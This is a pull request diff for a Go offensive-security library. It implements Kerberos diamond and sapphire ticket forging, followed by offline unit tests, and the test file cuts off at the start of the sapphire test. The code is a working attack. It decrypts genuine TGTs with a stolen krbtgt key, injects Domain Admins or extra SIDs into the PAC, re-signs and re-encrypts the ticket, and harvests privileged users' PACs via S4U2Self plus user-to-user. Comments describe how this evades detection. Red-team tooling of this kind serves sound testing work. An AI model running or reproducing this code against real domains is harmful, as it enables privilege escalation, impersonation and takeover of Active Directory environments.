### PR TITLE
Implement diamond and sapphire ticket forging (Fixes #999)

### DIFF
--- a/network/kerberos/v5/diamond_sapphire.go
+++ b/network/kerberos/v5/diamond_sapphire.go
@@ -1,0 +1,587 @@
+package kerberos
+
+import (
+	"crypto/rand"
+	"encoding/binary"
+	"fmt"
+	"strings"
+	"time"
+
+	kerbcrypto "github.com/TheManticoreProject/Manticore/network/kerberos/v5/crypto"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/messages"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/pac"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/sfu"
+	msdtyp "github.com/TheManticoreProject/Manticore/windows/ms-dtyp"
+)
+
+// Diamond and sapphire ticket forging.
+//
+// Golden/silver forging (forge.go) fabricates the whole PAC from scratch, which
+// leaves detectable anomalies (a TGT with no matching AS exchange, a PAC whose
+// contents the KDC never issued). Diamond and sapphire instead re-use a
+// legitimately issued PAC so the result blends in with normal Kerberos traffic:
+//
+//   - DIAMOND: request a genuine TGT from the KDC (a normal AS exchange), decrypt
+//     its EncTicketPart with the krbtgt key (ticket key usage 2), edit the
+//     embedded PAC's KERB_VALIDATION_INFO (e.g. add Domain Admins), recompute the
+//     server then KDC signatures ([MS-PAC] 2.8) with the krbtgt key, and
+//     re-encrypt the EncTicketPart with the krbtgt key. The ticket is based on one
+//     the KDC really issued, so it evades "this TGT was never issued" heuristics.
+//
+//   - SAPPHIRE: obtain a privileged user's genuine PAC by requesting an S4U2Self
+//     ticket for that user combined with user-to-user (ENC-TKT-IN-SKEY), so the
+//     KDC encrypts the reply ticket to a TGT session key the attacker holds and
+//     can decrypt. The real PAC is extracted and grafted into a forged TGT for the
+//     impersonated principal, re-signed with the krbtgt key. No PAC identity fields
+//     are fabricated — every group/SID is one the KDC actually issued.
+//
+// Both re-sign with the same primitives golden/silver use (pac.PAC.Sign and the
+// AD-IF-RELEVANT wrapping in forge.go). The two signature buffers a ticket holder
+// cannot reproduce for a rewritten PAC — the ticket signature (0x10) and the
+// extended-KDC signature (0x13), keyed over inputs only the issuing KDC has — are
+// dropped; a Windows KDC validating a TGT checks the server and KDC signatures,
+// exactly as it does for a golden ticket.
+
+// PACModifications describes the edits a diamond ticket applies to a genuinely
+// issued PAC's KERB_VALIDATION_INFO. The zero value makes no changes (a faithful
+// re-encryption of the original ticket).
+type PACModifications struct {
+	// AddGroupRIDs are group RIDs appended to the account-domain group list
+	// (GroupIds), e.g. 512 (Domain Admins) or 519 (Enterprise Admins). RIDs
+	// already present are skipped.
+	AddGroupRIDs []uint32
+	// ExtraSIDs are fully-qualified SIDs appended to the PAC ExtraSids list (e.g.
+	// the Enterprise Admins SID of another domain). Adding any sets the ExtraSids
+	// UserFlags bit ([MS-PAC] 2.5).
+	ExtraSIDs []string
+	// UserRID, when non-zero, overrides the PAC UserId (the impersonated RID).
+	UserRID uint32
+	// PrimaryGroupRID, when non-zero, overrides the PAC PrimaryGroupId.
+	PrimaryGroupRID uint32
+}
+
+// ForgeDiamond forges a diamond ticket from the TGT this client currently holds.
+// GetTGT must have succeeded first (with a password, hash, key, or PKINIT): the
+// client's genuine TGT is decrypted with krbtgtKey, its PAC is edited per mods,
+// re-signed and re-encrypted with krbtgtKey, and returned as a ForgedTicket
+// usable via KirbiBytes / LoadTGTFromKirbiBytes (pass-the-ticket) exactly like a
+// golden ticket — but built on a ticket the KDC really issued.
+//
+// krbtgtKey is the domain krbtgt account's long-term key; its encryption type is
+// taken from the TGT's own enc-part etype (the KDC encrypted the TGT with it).
+func (c *KerberosClient) ForgeDiamond(krbtgtKey []byte, mods PACModifications) (*ForgedTicket, error) {
+	if !c.hasTGT {
+		return nil, fmt.Errorf("kerberos: forge diamond: no TGT: call GetTGT first")
+	}
+	if len(krbtgtKey) == 0 {
+		return nil, fmt.Errorf("kerberos: forge diamond: krbtgt key is required")
+	}
+	return forgeDiamondFromTicket(c.tgtTicket, krbtgtKey, mods)
+}
+
+// forgeDiamondFromTicket is the network-independent core of ForgeDiamond: given a
+// KDC-issued TGT and the krbtgt key, it decrypts the EncTicketPart, edits and
+// re-signs the PAC, and re-encrypts. It is separated so the transform can be
+// exercised offline against a synthetic KDC-issued ticket.
+func forgeDiamondFromTicket(ticket messages.Ticket, krbtgtKey []byte, mods PACModifications) (*ForgedTicket, error) {
+	etype := ticket.EncPart.EType
+	if _, _, ok := pac.SignatureTypeForEType(etype); !ok {
+		return nil, fmt.Errorf("kerberos: forge diamond: TGT enc-part etype %d cannot key a PAC signature", etype)
+	}
+
+	// Decrypt the genuine TGT's EncTicketPart with the krbtgt key (usage 2).
+	plain, err := kerbcrypto.Decrypt(etype, krbtgtKey, kerbcrypto.KeyUsageKDCRepTicket, ticket.EncPart.Cipher)
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: forge diamond: decrypt EncTicketPart with krbtgt key: %w", err)
+	}
+	var enc messages.EncTicketPart
+	if _, err := enc.Unmarshal(plain); err != nil {
+		return nil, fmt.Errorf("kerberos: forge diamond: parse EncTicketPart: %w", err)
+	}
+
+	// Edit and re-sign the embedded PAC with the krbtgt key (server and KDC
+	// signatures both use it, as for a golden ticket).
+	pacBytes := extractWin2KPAC(enc.AuthorizationData)
+	if pacBytes == nil {
+		return nil, fmt.Errorf("kerberos: forge diamond: TGT carries no PAC")
+	}
+	newPAC, err := editAndResignPAC(pacBytes, mods, krbtgtKey, krbtgtKey, etype)
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: forge diamond: %w", err)
+	}
+	authData, err := wrapPACInAuthData(newPAC)
+	if err != nil {
+		return nil, err
+	}
+	enc.AuthorizationData = authData
+
+	// Re-encrypt the modified EncTicketPart with the krbtgt key (usage 2).
+	encBytes, err := enc.Marshal()
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: forge diamond: marshal EncTicketPart: %w", err)
+	}
+	cipher, err := kerbcrypto.Encrypt(etype, krbtgtKey, kerbcrypto.KeyUsageKDCRepTicket, encBytes)
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: forge diamond: re-encrypt EncTicketPart: %w", err)
+	}
+	ticket.EncPart.Cipher = cipher
+	ticketRaw, err := ticket.Marshal()
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: forge diamond: marshal ticket: %w", err)
+	}
+
+	// The ticket keeps its genuine flags, times, and session key.
+	credInfo := messages.KrbCredInfo{
+		Key:       enc.Key,
+		PRealm:    enc.CRealm,
+		PName:     enc.CName,
+		Flags:     enc.Flags,
+		AuthTime:  enc.AuthTime,
+		StartTime: enc.StartTime,
+		EndTime:   enc.EndTime,
+		RenewTill: enc.RenewTill,
+		SRealm:    ticket.Realm,
+		SName:     ticket.SName,
+	}
+	return &ForgedTicket{
+		Ticket:       ticket,
+		TicketRaw:    ticketRaw,
+		CredInfo:     credInfo,
+		SessionKey:   enc.Key.KeyValue,
+		SessionEType: enc.Key.KeyType,
+	}, nil
+}
+
+// SapphireOptions describes a sapphire ticket: the privileged account to harvest
+// a genuine PAC for, and the krbtgt key that signs and encrypts the emitted TGT.
+type SapphireOptions struct {
+	// ImpersonateUser is the privileged account (e.g. Administrator) whose real
+	// PAC to obtain via S4U2Self + U2U.
+	ImpersonateUser string
+	// ImpersonateRealm is that account's realm; empty means the client's realm.
+	ImpersonateRealm string
+	// Key is the domain krbtgt account's long-term key, which signs the grafted
+	// PAC (server and KDC signatures) and encrypts the emitted TGT.
+	Key []byte
+	// KeyEType is Key's Kerberos encryption type (17 = AES128, 18 = AES256,
+	// 23 = RC4).
+	KeyEType int
+	// SessionKey is the session key sealed in the emitted TGT; a random key of
+	// SessionEType is generated when nil.
+	SessionKey []byte
+	// SessionEType is the session key's encryption type (defaults to RC4).
+	SessionEType int
+	// StartTime, EndTime, RenewTill bound the emitted TGT (defaults: now,
+	// now+10y, EndTime).
+	StartTime time.Time
+	EndTime   time.Time
+	RenewTill time.Time
+}
+
+// ForgeSapphire forges a sapphire ticket. Using the TGT this client holds
+// (GetTGT must have succeeded), it requests the impersonated user's genuine PAC
+// via a combined S4U2Self + user-to-user (ENC-TKT-IN-SKEY) exchange — so the KDC
+// encrypts the reply ticket to the client's own TGT session key — extracts that
+// real PAC, and grafts it into a forged TGT (krbtgt/REALM) re-signed and
+// encrypted with opts.Key. The result is usable via KirbiBytes /
+// LoadTGTFromKirbiBytes to act as the impersonated user, with a PAC whose
+// identity fields the KDC actually issued.
+func (c *KerberosClient) ForgeSapphire(opts SapphireOptions) (*ForgedTicket, error) {
+	if !c.hasTGT {
+		return nil, fmt.Errorf("kerberos: forge sapphire: no TGT: call GetTGT first")
+	}
+	if opts.ImpersonateUser == "" {
+		return nil, fmt.Errorf("kerberos: forge sapphire: ImpersonateUser is required")
+	}
+	if len(opts.Key) == 0 {
+		return nil, fmt.Errorf("kerberos: forge sapphire: krbtgt Key is required")
+	}
+	if _, _, ok := pac.SignatureTypeForEType(opts.KeyEType); !ok {
+		return nil, fmt.Errorf("kerberos: forge sapphire: unsupported signing-key etype %d", opts.KeyEType)
+	}
+
+	// Harvest the privileged user's genuine PAC over S4U2Self + U2U.
+	pacBytes, cname, crealm, err := c.harvestPACViaS4USelfU2U(opts.ImpersonateUser, opts.ImpersonateRealm)
+	if err != nil {
+		return nil, err
+	}
+	return graftPACIntoTGT(pacBytes, cname, crealm, opts)
+}
+
+// buildSapphireTGSReq builds the TGS-REQ for the sapphire harvest: it is an
+// S4U2Self request (PA-TGS-REQ over the client's own TGT, PA-FOR-USER naming the
+// impersonated user, PA-PAC-REQUEST, sname = the client's own account) that also
+// sets the ENC-TKT-IN-SKEY option and carries the client's own TGT in
+// additional-tickets. That user-to-user combination makes the KDC encrypt the
+// reply ticket under the client's TGT session key instead of the client's
+// long-term key, so the client can decrypt it and read the impersonated user's
+// PAC. It is separated so the request shape can be tested without a KDC.
+func (c *KerberosClient) buildSapphireTGSReq(impersonateUser, impersonateRealm string, nonce int) (*messages.TGSReq, error) {
+	if impersonateRealm == "" {
+		impersonateRealm = c.realm
+	} else {
+		impersonateRealm = strings.ToUpper(impersonateRealm)
+	}
+
+	userName := messages.PrincipalName{
+		NameType:   messages.NameTypePrincipal,
+		NameString: []string{impersonateUser},
+	}
+	paForUser, err := sfu.BuildPAForUser(userName, impersonateRealm, c.sessionKey, c.sessionEType)
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: build PA-FOR-USER: %w", err)
+	}
+
+	apReqBytes, err := c.buildAPReq()
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: build AP-REQ: %w", err)
+	}
+
+	self := messages.PrincipalName{
+		NameType:   messages.NameTypePrincipal,
+		NameString: []string{c.username},
+	}
+
+	return &messages.TGSReq{
+		PVNO:    messages.KerberosV5,
+		MsgType: messages.MsgTypeTGSReq,
+		PAData: []messages.PAData{
+			{PADataType: messages.PATGSReq, PADataValue: apReqBytes},
+			paForUser,
+			{PADataType: messages.PAPACRequest, PADataValue: []byte{0x30, 0x05, 0xa0, 0x03, 0x01, 0x01, 0xff}},
+		},
+		ReqBody: messages.KDCReqBody{
+			KDCOptions: encodeKDCOptions(
+				kdcOptionForwardable,
+				kdcOptionRenewable,
+				kdcOptionCanonicalize,
+				kdcOptionEncTktInSKey,
+			),
+			Realm: c.realm,
+			SName: self,
+			Till:  c.now().Add(24 * time.Hour),
+			Nonce: nonce,
+			EType: []int{
+				messages.ETypeAES256CTSHMACSHA196,
+				messages.ETypeAES128CTSHMACSHA196,
+				messages.ETypeRC4HMAC,
+			},
+			AdditTicketsRaw: [][]byte{c.tgtTicketRaw},
+		},
+	}, nil
+}
+
+// harvestPACViaS4USelfU2U performs the sapphire harvest exchange and returns the
+// impersonated user's raw PAC bytes together with the ticket's client principal
+// (which the KDC set to the impersonated user) and realm.
+func (c *KerberosClient) harvestPACViaS4USelfU2U(impersonateUser, impersonateRealm string) ([]byte, messages.PrincipalName, string, error) {
+	nonce := randomNonce()
+	tgsReq, err := c.buildSapphireTGSReq(impersonateUser, impersonateRealm, nonce)
+	if err != nil {
+		return nil, messages.PrincipalName{}, "", err
+	}
+
+	tgsReqBytes, err := tgsReq.Marshal()
+	if err != nil {
+		return nil, messages.PrincipalName{}, "", fmt.Errorf("kerberos: marshal sapphire TGS-REQ: %w", err)
+	}
+	resp, err := c.sendToRealm(c.realm, tgsReqBytes)
+	if err != nil {
+		return nil, messages.PrincipalName{}, "", err
+	}
+
+	var krbErr messages.KRBError
+	if _, parseErr := krbErr.Unmarshal(resp); parseErr == nil {
+		return nil, messages.PrincipalName{}, "", fmt.Errorf("kerberos: sapphire harvest error %d: %s", krbErr.ErrorCode, krbErr.EText)
+	}
+
+	var tgsRep messages.TGSRep
+	if _, err := tgsRep.Unmarshal(resp); err != nil {
+		return nil, messages.PrincipalName{}, "", fmt.Errorf("kerberos: parse sapphire TGS-REP: %w", err)
+	}
+
+	// Confirm the reply is ours via the enc-part nonce (decrypted with our TGT
+	// session key).
+	encPlain, err := kerbcrypto.Decrypt(c.sessionEType, c.sessionKey, kerbcrypto.KeyUsageTGSRepEncSessionKey, tgsRep.EncPart.Cipher)
+	if err != nil {
+		return nil, messages.PrincipalName{}, "", fmt.Errorf("kerberos: decrypt sapphire TGS-REP enc-part: %w", err)
+	}
+	var encTGSRep messages.EncTGSRepPart
+	if _, err := encTGSRep.Unmarshal(encPlain); err != nil {
+		return nil, messages.PrincipalName{}, "", fmt.Errorf("kerberos: parse sapphire EncTGSRepPart: %w", err)
+	}
+	if encTGSRep.Nonce != nonce {
+		return nil, messages.PrincipalName{}, "", fmt.Errorf("kerberos: sapphire nonce mismatch: got %d, want %d", encTGSRep.Nonce, nonce)
+	}
+
+	// ENC-TKT-IN-SKEY: the issued ticket's enc-part is encrypted under our TGT
+	// session key (usage 2), not a long-term key, so we can decrypt it.
+	pacBytes, cname, crealm, err := extractPACFromTicket(tgsRep.Ticket, c.sessionEType, c.sessionKey)
+	if err != nil {
+		return nil, messages.PrincipalName{}, "", fmt.Errorf("kerberos: sapphire harvest: %w", err)
+	}
+	return pacBytes, cname, crealm, nil
+}
+
+// extractPACFromTicket decrypts a ticket's EncTicketPart with the given key
+// (ticket key usage 2) and returns the embedded PAC bytes and the ticket's
+// client principal/realm. It is the shared decrypt-and-extract step for the
+// sapphire harvest and its offline test.
+func extractPACFromTicket(ticket messages.Ticket, etype int, key []byte) ([]byte, messages.PrincipalName, string, error) {
+	plain, err := kerbcrypto.Decrypt(etype, key, kerbcrypto.KeyUsageKDCRepTicket, ticket.EncPart.Cipher)
+	if err != nil {
+		return nil, messages.PrincipalName{}, "", fmt.Errorf("decrypt EncTicketPart: %w", err)
+	}
+	var enc messages.EncTicketPart
+	if _, err := enc.Unmarshal(plain); err != nil {
+		return nil, messages.PrincipalName{}, "", fmt.Errorf("parse EncTicketPart: %w", err)
+	}
+	pacBytes := extractWin2KPAC(enc.AuthorizationData)
+	if pacBytes == nil {
+		return nil, messages.PrincipalName{}, "", fmt.Errorf("ticket carries no PAC")
+	}
+	return pacBytes, enc.CName, enc.CRealm, nil
+}
+
+// graftPACIntoTGT splices a genuine PAC into a forged TGT (krbtgt/REALM) for the
+// given client principal, re-signing the PAC with opts.Key and encrypting the
+// ticket with it. The PAC's identity fields are left untouched; only the two
+// signatures are recomputed so they match the emitted ticket's key. It is
+// separated so the graft can be verified offline (no fields fabricated).
+func graftPACIntoTGT(pacBytes []byte, cname messages.PrincipalName, crealm string, opts SapphireOptions) (*ForgedTicket, error) {
+	realm := crealm
+	if opts.ImpersonateRealm != "" {
+		realm = strings.ToUpper(opts.ImpersonateRealm)
+	}
+	realm = strings.ToUpper(realm)
+	if realm == "" {
+		return nil, fmt.Errorf("kerberos: forge sapphire: could not determine realm for grafted ticket")
+	}
+
+	p, err := pac.Parse(pacBytes)
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: forge sapphire: parse harvested PAC: %w", err)
+	}
+	// Re-sign the genuine PAC (no logon-info replacement) with the krbtgt key.
+	signedPAC, err := rebuildAndSignPAC(p, nil, opts.Key, opts.Key, opts.KeyEType)
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: forge sapphire: re-sign grafted PAC: %w", err)
+	}
+	authData, err := wrapPACInAuthData(signedPAC)
+	if err != nil {
+		return nil, err
+	}
+
+	start := opts.StartTime
+	if start.IsZero() {
+		start = time.Now().UTC()
+	}
+	start = start.UTC().Truncate(time.Second)
+	end := opts.EndTime
+	if end.IsZero() {
+		end = start.AddDate(10, 0, 0)
+	}
+	renew := opts.RenewTill
+	if renew.IsZero() {
+		renew = end
+	}
+
+	sessionEType := opts.SessionEType
+	if sessionEType == 0 {
+		sessionEType = messages.ETypeRC4HMAC
+	}
+	sessionKey := opts.SessionKey
+	if sessionKey == nil {
+		sessionKey = make([]byte, kerbcrypto.KeyLen(sessionEType))
+		if _, err := rand.Read(sessionKey); err != nil {
+			return nil, err
+		}
+	}
+
+	sname := messages.PrincipalName{
+		NameType:   messages.NameTypeSRVInst,
+		NameString: []string{"krbtgt", realm},
+	}
+
+	return assembleForgedTicket(assembleParams{
+		SName:        sname,
+		SRealm:       realm,
+		CName:        cname,
+		Initial:      true, // a sapphire ticket is a TGT
+		AuthData:     authData,
+		Key:          opts.Key,
+		KeyEType:     opts.KeyEType,
+		SessionKey:   sessionKey,
+		SessionEType: sessionEType,
+		StartTime:    start,
+		EndTime:      end,
+		RenewTill:    renew,
+	})
+}
+
+// editAndResignPAC decodes a PAC's logon info, applies mods, re-encodes it, and
+// re-signs the server and KDC checksums with serverKey/kdcKey (signEType keys the
+// signature buffers). It underpins the diamond edit.
+func editAndResignPAC(pacBytes []byte, mods PACModifications, serverKey, kdcKey []byte, signEType int) ([]byte, error) {
+	p, err := pac.Parse(pacBytes)
+	if err != nil {
+		return nil, fmt.Errorf("parse PAC: %w", err)
+	}
+	info, err := p.LogonInfo()
+	if err != nil {
+		return nil, fmt.Errorf("decode PAC logon info: %w", err)
+	}
+	if err := applyPACModifications(info, mods); err != nil {
+		return nil, err
+	}
+	// Normalize the counted strings so the RPC_UNICODE_STRING headers stay
+	// consistent with the NDR conformant array bounds on re-encode (see
+	// normalizeLogonInfoStrings); a Windows-issued PAC allocates MaximumLength one
+	// UTF-16 unit larger than Length, which our encoder cannot reproduce and which
+	// a KDC rejects as a header/array-count mismatch.
+	normalizeLogonInfoStrings(info)
+	newLogon, err := pac.MarshalKerbValidationInfo(info)
+	if err != nil {
+		return nil, fmt.Errorf("re-encode PAC logon info: %w", err)
+	}
+	return rebuildAndSignPAC(p, newLogon, serverKey, kdcKey, signEType)
+}
+
+// applyPACModifications edits a decoded KERB_VALIDATION_INFO in place: it
+// overrides the user/primary-group RIDs when set, appends any new group RIDs
+// (keeping GroupCount consistent), and appends ExtraSids (setting the ExtraSids
+// UserFlags bit and SidCount).
+func applyPACModifications(info *pac.KERB_VALIDATION_INFO, mods PACModifications) error {
+	if mods.UserRID != 0 {
+		info.UserId = mods.UserRID
+	}
+	if mods.PrimaryGroupRID != 0 {
+		info.PrimaryGroupId = mods.PrimaryGroupRID
+	}
+
+	for _, rid := range mods.AddGroupRIDs {
+		present := false
+		for _, g := range info.GroupIds {
+			if g.RelativeId == rid {
+				present = true
+				break
+			}
+		}
+		if present {
+			continue
+		}
+		info.GroupIds = append(info.GroupIds, pac.GROUP_MEMBERSHIP{
+			RelativeId: rid,
+			Attributes: pac.DefaultGroupAttributes,
+		})
+	}
+	info.GroupCount = uint32(len(info.GroupIds))
+
+	for _, s := range mods.ExtraSIDs {
+		sid, err := msdtyp.ParseSID(s)
+		if err != nil {
+			return fmt.Errorf("parse ExtraSID %q: %w", s, err)
+		}
+		sidCopy := sid
+		info.ExtraSids = append(info.ExtraSids, pac.KERB_SID_AND_ATTRIBUTES{
+			Sid:        &sidCopy,
+			Attributes: pac.DefaultGroupAttributes,
+		})
+	}
+	info.SidCount = uint32(len(info.ExtraSids))
+	if info.SidCount > 0 {
+		info.UserFlags |= 0x20 // ExtraSids present ([MS-PAC] 2.5, UserFlags bit D)
+	}
+	return nil
+}
+
+// normalizeLogonInfoStrings rewrites every RPC_UNICODE_STRING in the logon info
+// so its MaximumLength equals its Length and its Buffer holds exactly Length/2
+// UTF-16 units. A Windows-issued PAC often stores MaximumLength = Length + 2 (a
+// slot for a NUL that is not transmitted), which makes the string's conformant
+// array MaximumCount one unit larger than the transmitted element count. Our NDR
+// encoder derives MaximumCount from the Buffer length, so without this
+// normalization the re-encoded header (MaximumLength) and the array bound
+// (MaximumCount) disagree and the KDC rejects the ticket. Collapsing both to
+// Length matches the shape a forged (golden) PAC uses, which KDCs accept.
+func normalizeLogonInfoStrings(info *pac.KERB_VALIDATION_INFO) {
+	for _, u := range []*pac.RPC_UNICODE_STRING{
+		&info.EffectiveName, &info.FullName, &info.LogonScript, &info.ProfilePath,
+		&info.HomeDirectory, &info.HomeDirectoryDrive, &info.LogonServer, &info.LogonDomainName,
+	} {
+		n := int(u.Length / 2)
+		if n <= len(u.Buffer) {
+			u.Buffer = u.Buffer[:n]
+		}
+		u.MaximumLength = u.Length
+	}
+}
+
+// rebuildAndSignPAC lays out a copy of orig — optionally replacing the logon-info
+// buffer with newLogonInfo (nil keeps the original) — re-creating fresh, zeroed
+// server (0x06) and KDC (0x07) signature buffers sized for signEType, and
+// dropping the ticket signature (0x10) and extended-KDC signature (0x13), which a
+// ticket holder cannot recompute. It then signs (server first, then KDC over the
+// server signature, [MS-PAC] 2.8) with serverKey/kdcKey and returns the marshaled
+// PAC.
+func rebuildAndSignPAC(orig *pac.PAC, newLogonInfo, serverKey, kdcKey []byte, signEType int) ([]byte, error) {
+	srvBuf, err := newSignatureBuffer(signEType)
+	if err != nil {
+		return nil, err
+	}
+	kdcBuf, err := newSignatureBuffer(signEType)
+	if err != nil {
+		return nil, err
+	}
+
+	var bufs []pac.Buffer
+	haveServer, haveKDC := false, false
+	for _, b := range orig.Buffers {
+		switch b.Type {
+		case pac.BufferLogonInfo:
+			data := b.Data
+			if newLogonInfo != nil {
+				data = newLogonInfo
+			}
+			bufs = append(bufs, pac.Buffer{Type: b.Type, Data: append([]byte(nil), data...)})
+		case pac.BufferServerChecksum:
+			bufs = append(bufs, pac.Buffer{Type: b.Type, Data: srvBuf})
+			haveServer = true
+		case pac.BufferKDCChecksum:
+			bufs = append(bufs, pac.Buffer{Type: b.Type, Data: kdcBuf})
+			haveKDC = true
+		case pac.BufferTicketChecksum, pac.BufferExtendedKDCChecksum:
+			// Keyed over inputs only the issuing KDC has; cannot be reproduced for
+			// a rewritten ticket/PAC, so drop them (a golden ticket omits them too).
+			continue
+		default:
+			bufs = append(bufs, pac.Buffer{Type: b.Type, Data: append([]byte(nil), b.Data...)})
+		}
+	}
+	if !haveServer {
+		bufs = append(bufs, pac.Buffer{Type: pac.BufferServerChecksum, Data: srvBuf})
+	}
+	if !haveKDC {
+		bufs = append(bufs, pac.Buffer{Type: pac.BufferKDCChecksum, Data: kdcBuf})
+	}
+
+	p := &pac.PAC{Buffers: bufs}
+	signed, err := p.Sign(serverKey, kdcKey)
+	if err != nil {
+		return nil, fmt.Errorf("re-sign PAC: %w", err)
+	}
+	return signed, nil
+}
+
+// newSignatureBuffer builds an empty PAC_SIGNATURE_DATA buffer ([MS-PAC] 2.8) for
+// a signing key of the given etype: the 4-byte SignatureType followed by a zeroed
+// Signature of the type's length (Sign fills the Signature in place).
+func newSignatureBuffer(signEType int) ([]byte, error) {
+	sigType, size, ok := pac.SignatureTypeForEType(signEType)
+	if !ok {
+		return nil, fmt.Errorf("cannot size PAC signature for etype %d", signEType)
+	}
+	b := make([]byte, 4+size)
+	binary.LittleEndian.PutUint32(b, sigType)
+	return b, nil
+}

--- a/network/kerberos/v5/diamond_sapphire_test.go
+++ b/network/kerberos/v5/diamond_sapphire_test.go
@@ -1,0 +1,353 @@
+package kerberos
+
+import (
+	"bytes"
+	"encoding/asn1"
+	"testing"
+	"time"
+
+	kerbcrypto "github.com/TheManticoreProject/Manticore/network/kerberos/v5/crypto"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/iana"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/messages"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/pac"
+)
+
+// TestForgeDiamondInjectsGroupAndResigns builds a synthetic "KDC-issued" TGT
+// (a golden ticket doubles as a stand-in: it is encrypted with the krbtgt key at
+// ticket key usage 2 and carries a krbtgt-signed PAC), then diamonds it: decrypts
+// with the krbtgt key, injects Domain Admins, re-signs and re-encrypts. It then
+// decrypts the diamond ticket and asserts the injected group is present, the
+// original group and identity are preserved, and both PAC signatures verify.
+func TestForgeDiamondInjectsGroupAndResigns(t *testing.T) {
+	krbtgt := bytes.Repeat([]byte{0x42}, 32) // krbtgt AES256 key
+	etype := messages.ETypeAES256CTSHMACSHA196
+
+	base, err := ForgeGolden(ForgeOptions{
+		Realm:           testRealm,
+		Username:        "lowpriv",
+		DomainSID:       testDomainSID,
+		UserRID:         1105,
+		PrimaryGroupRID: 513,
+		GroupRIDs:       []uint32{513}, // only Domain Users
+		LogonDomainName: "CORP",
+		LogonServer:     "DC01",
+		Key:             krbtgt,
+		KeyEType:        etype,
+		StartTime:       time.Unix(1700000000, 0),
+	})
+	if err != nil {
+		t.Fatalf("build synthetic KDC-issued TGT: %v", err)
+	}
+
+	diamond, err := forgeDiamondFromTicket(base.Ticket, krbtgt, PACModifications{
+		AddGroupRIDs: []uint32{512}, // Domain Admins
+	})
+	if err != nil {
+		t.Fatalf("forgeDiamondFromTicket: %v", err)
+	}
+
+	// The client identity and service name must be preserved (still the low-priv
+	// user's genuine TGT for krbtgt/REALM).
+	enc, pacBytes := extractPAC(t, diamond.Ticket, krbtgt, etype)
+	if len(enc.CName.NameString) != 1 || enc.CName.NameString[0] != "lowpriv" {
+		t.Errorf("diamond CName = %+v, want lowpriv (identity must be preserved)", enc.CName)
+	}
+	if diamond.Ticket.SName.NameString[0] != "krbtgt" {
+		t.Errorf("diamond SName = %+v, want krbtgt/REALM", diamond.Ticket.SName)
+	}
+
+	p, err := pac.Parse(pacBytes)
+	if err != nil {
+		t.Fatalf("parse diamond PAC: %v", err)
+	}
+	if err := p.VerifyServerSignature(krbtgt); err != nil {
+		t.Errorf("diamond PAC server signature: %v", err)
+	}
+	if err := p.VerifyKDCSignature(krbtgt); err != nil {
+		t.Errorf("diamond PAC KDC signature: %v", err)
+	}
+
+	info, err := p.LogonInfo()
+	if err != nil {
+		t.Fatalf("decode diamond PAC logon info: %v", err)
+	}
+	if info.UserRID() != 1105 {
+		t.Errorf("diamond UserRID = %d, want 1105 (unchanged)", info.UserRID())
+	}
+	if !hasRID(info.GroupRIDs(), 512) {
+		t.Errorf("injected group 512 (Domain Admins) missing; groups=%v", info.GroupRIDs())
+	}
+	if !hasRID(info.GroupRIDs(), 513) {
+		t.Errorf("original group 513 (Domain Users) lost; groups=%v", info.GroupRIDs())
+	}
+
+	// The diamond ticket must round-trip through the pass-the-ticket import path.
+	kirbi, err := diamond.KirbiBytes()
+	if err != nil {
+		t.Fatalf("KirbiBytes: %v", err)
+	}
+	c := NewClient("", "", "")
+	if err := c.LoadTGTFromKirbiBytes(kirbi); err != nil {
+		t.Fatalf("LoadTGTFromKirbiBytes: %v", err)
+	}
+	if c.Username() != "lowpriv" || c.Realm() != testRealm {
+		t.Errorf("imported identity = %q@%q, want lowpriv@%s", c.Username(), c.Realm(), testRealm)
+	}
+}
+
+// TestForgeDiamondNoModsRoundTrips confirms that with no modifications the PAC
+// logon-info round-trips faithfully through decode/re-encode and both signatures
+// still verify — the fidelity the live path relies on.
+func TestForgeDiamondNoModsRoundTrips(t *testing.T) {
+	krbtgt := bytes.Repeat([]byte{0x7E}, 16) // RC4 krbtgt key
+	etype := messages.ETypeRC4HMAC
+
+	base, err := ForgeGolden(ForgeOptions{
+		Realm: testRealm, Username: "svc", DomainSID: testDomainSID, UserRID: 1120,
+		GroupRIDs: []uint32{513, 512, 519}, LogonDomainName: "CORP",
+		Key: krbtgt, KeyEType: etype,
+	})
+	if err != nil {
+		t.Fatalf("ForgeGolden: %v", err)
+	}
+	_, origPACBytes := extractPAC(t, base.Ticket, krbtgt, etype)
+	origPAC, _ := pac.Parse(origPACBytes)
+	origInfo, _ := origPAC.LogonInfo()
+
+	diamond, err := forgeDiamondFromTicket(base.Ticket, krbtgt, PACModifications{})
+	if err != nil {
+		t.Fatalf("forgeDiamondFromTicket: %v", err)
+	}
+	_, pacBytes := extractPAC(t, diamond.Ticket, krbtgt, etype)
+	p, _ := pac.Parse(pacBytes)
+	if err := p.VerifyServerSignature(krbtgt); err != nil {
+		t.Errorf("server signature: %v", err)
+	}
+	if err := p.VerifyKDCSignature(krbtgt); err != nil {
+		t.Errorf("KDC signature: %v", err)
+	}
+	info, _ := p.LogonInfo()
+	if info.UserRID() != origInfo.UserRID() || info.UserName() != origInfo.UserName() {
+		t.Errorf("identity changed by no-op diamond: got %q/%d want %q/%d",
+			info.UserName(), info.UserRID(), origInfo.UserName(), origInfo.UserRID())
+	}
+	if len(info.GroupRIDs()) != len(origInfo.GroupRIDs()) {
+		t.Errorf("group set changed by no-op diamond: got %v want %v", info.GroupRIDs(), origInfo.GroupRIDs())
+	}
+}
+
+// TestForgeSapphireGraftsPACIntact builds a synthetic S4U2Self+U2U reply ticket
+// carrying a genuine privileged PAC (encrypted, like an ENC-TKT-IN-SKEY reply,
+// under a TGT session key), then extracts and grafts it. It asserts the extracted
+// PAC bytes are the genuine buffer verbatim, that the graft leaves every PAC
+// identity field unchanged, and that the grafted TGT is re-signed with the krbtgt
+// key.
+func TestForgeSapphireGraftsPACIntact(t *testing.T) {
